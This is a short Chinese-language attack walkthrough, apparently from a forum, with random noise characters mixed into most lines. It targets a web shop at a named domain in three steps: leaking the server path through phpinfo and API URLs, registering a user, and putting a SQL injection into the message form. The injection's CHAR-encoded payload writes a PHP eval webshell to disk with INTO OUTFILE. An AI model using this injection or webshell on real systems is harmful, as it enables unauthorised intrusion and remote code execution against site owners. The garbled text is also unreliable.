第一个:想办法找到目标网站的绝对路径0 _7 ^ t$ k8 x, N2 I9 }8 c
h! ?/ p$ C" d% s& G
http://www.political-security.com/install/svinfo.php?phpinfo=true, ]" v' t* J. }" d. }
% a1 i" z: M9 I9 \; [
http:/www.political-security.com/core/api/shop_api.php
( D( I* V7 s. z9 a1 p; L; [7 f# x: c2 o8 K0 U: X( d5 [7 Y* ?
http://www.political-security.co ... api_b2b_2_0_cat.php
4 X! }" @" W2 X: j8 Y! O5 z. [3 b2 {2 }/ d) f
http://www.political-security.com/core/ap ... b_2_0_goodstype.php U, z: ^; }: i
* a: a7 B. X z5 h9 Rhttp://www.political-security.co ... i_b2b_2_0_brand.php' p4 j% @) `* ~7 R! }4 r
第二个:注册一个普通用户
0 ?/ C2 E$ i' c% L: L: ^& J6 ]5 |* H
, J) M# \) q- y J' |0 Chttp://www.political-security.com/?passport-signup.html/ X1 {4 F' j7 Z. t4 }' d/ J1 J- k
! E( ]# y. G6 S7 I# T
第三个: 发送消息 + h( h' m( O; N. J, w/ V- F1 v
/ P; \) W8 A' U* g2 Z
http://www.political-security.com/?member-send.html8 z! {; V( V0 Z, C0 Y
发送给中填写
; ?$ I) L" D2 V' ?antian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |